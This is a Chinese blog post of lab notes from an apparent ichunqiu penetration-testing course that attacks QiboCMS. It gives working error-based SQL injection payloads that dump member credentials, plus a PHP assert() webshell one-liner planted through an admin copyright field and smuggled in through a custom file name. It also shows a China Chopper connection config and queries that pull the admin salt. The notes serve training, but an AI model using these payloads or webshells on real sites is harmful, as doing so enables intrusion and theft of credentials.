分类
CTF

ichunqiu-渗透测试入门03-渗透测试笔记

 ## 渗透测试笔记
 
 ### 工具
 - HackBar(渗透插件)
 - 御剑(后台扫描)
 - 中国菜刀(webshell)
 
 ### 平台
 - 信息咨询平台(齐博CMS)
 - 论坛社区(Discuz!)
 
 ### 步骤
 1. SQL注入攻击获取齐博CMS后台账密
     1. 使用Firefox(有hackbar插件-F9)打开网站
     2. 注册一个用户,在“会员中心”->“专题管理”->“创建专题”
     3. 创建完毕,点击专题名称,记录此时URL后的id值。
     4. F9打开Hackbar,进行注入
         > 地址栏:
         >    >www.xxx.com/member/special.php?job=show_BBSiframe&id=27type=all
         >      
         > Post data:
         >    >TB_pre=qb_members where 1 and extractvalue(1,concat(0,(select concat(0x7e,username,password) from qb_members limit 1)))-- a
         >
         > 获取完整密码,修改Post data
         >    >TB_pre=qb_members where 1 and extractvalue(1,concat(0,(select concat(password) from qb_members limit 1)))-- a 
         >
         > 再列举一例注入函数 (文末附其他函数)
         >    >TB_pre=qb_members where 1 and updatexml(1,concat(0,(select concat(0x7e,username,password) from qb_members limit 1)),0)-- a
         >     
     5. 得到用户名和密码;对获取的密码进行MD5解密(whoami!@#123)
 
 2. 扫描后台目录
 
 3. 挂马一 后台频道页版权信息写入木马
     1. 在"系统功能"->"全局参数设置"->"网页底部版权信息"处(此CMS对eval()函数进行了过滤)
         > <?php @assert($_POST['cmd']); ?>
     2. 在"系统功能"->"频道独立页管理"->"添加频道页"
         - 频道页名称随意,例如“wm”
         - 静态文件名必须加上".php"否则菜刀连不上,例如"wm.php"
         - 提交完毕,在“频道管理页”中可以看到刚添加的频道页,点击“静态化”,否则无法显示404。
     3. 正常访问“wm.php”后,使用菜刀进行连接。
 
 4. 挂马二 前台栏目投稿自定义文件名写入木马(需要一定权限,admin登陆)
     1. 登陆系统,点击“我要投稿”;选择一个栏目,点击后侧“发表”
     2. 在投稿界面中,选择“其他设置”,在“自定义文件名:”写入:
         > x';@assert($_POST['cmd']);//yy.htm
         >     
     其中,`x';`是为了闭合;`//y.htm`是为了使整体文件名有静态网页的后缀,并注释掉后面的代码。
     3. 在投稿界面的“基本信息”中,填写一些信息,然后提交
     4. 提交后访问`http://www.xxx.com/data/showhtmltype.php`,可以看到报错信息,`Notice:Use of undefined......in C:\www\WWW\data\showhtmltype.php on line 2`
     5. 使用菜刀进行连接数据库
         > 
         > 地址:
         > 
         >     http://www.xx.com/m.php  pwd
         >     
         > 配置:
         > 
             <T>mysql<T>
              <H>172.16.12.3</H>
              <U>root</U>
              <P>password</P>
              <L>gbk</L>
         > 其他
         >
             PHP(Eval) GB2312  
         >
 5. 获取数据库中admin的salt字段值
     1. 使用菜刀连接完毕后,搜索`common.inc.php`文件;该文件一般在目录`\data\common.inc.php`。
     2. 找到该文件,查看数据库连接信息;注意网址和ip的对应信息。
     3. 利用中国菜刀连接数据库。
     4. 利用MySQL自带的`information_schema`数据库,它提供了对元数据的访问方式;其中`information_schema.COLUMNS`表中记录本数据库中所有字段的相关信息
     >
     >     SELECT * FROM COLUMNS WHERE COLUMN_NAME = 'salt'
          
     上述即可得到表明,然后查询即可得到admin用户的信息。
     >     
     >     SELECT * FROM TABLENAME WHERE USERNAME = 'admin';
     >     
     
 >    附:常用十大报错函数
 > 
 > - floor()
 > - extractvalue()
 > - undatexml()
 > - geometrycollection()
 > - multipoint()
 > - polygon()
 > - multipolygon()
 > - linestring()
 > - multilinestring()
 > - exp()
 
 
 
 

shuoed

山东鄄城人士,大学本科读了计算机科学与技术专业,研究生期间读了诉讼法学专业。
计算机领域,算法方面是算是ACM省银水平;编程方面在高校取得过项目比赛的奖励;网络方面考过了计算机等级四级网络工程师;安全方面考过了软考信息安全工程师;学术方面发表了一篇关于密码设置的论文,毕业论文写了X86架构下微内核的设计与实现。
法律领域,学术方面发表了三篇分别关于身份同一认定、不损坏原件原则、跨境取证的论文,写了一篇关于DDoS黑产的硕士论文(投稿中);取证方面参见了三类电子取证比赛,虎鲸杯、中科实数杯、美亚杯等共6次比赛,5次获奖。
目前就职于国内某知名电子取证公司做培训讲师。

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注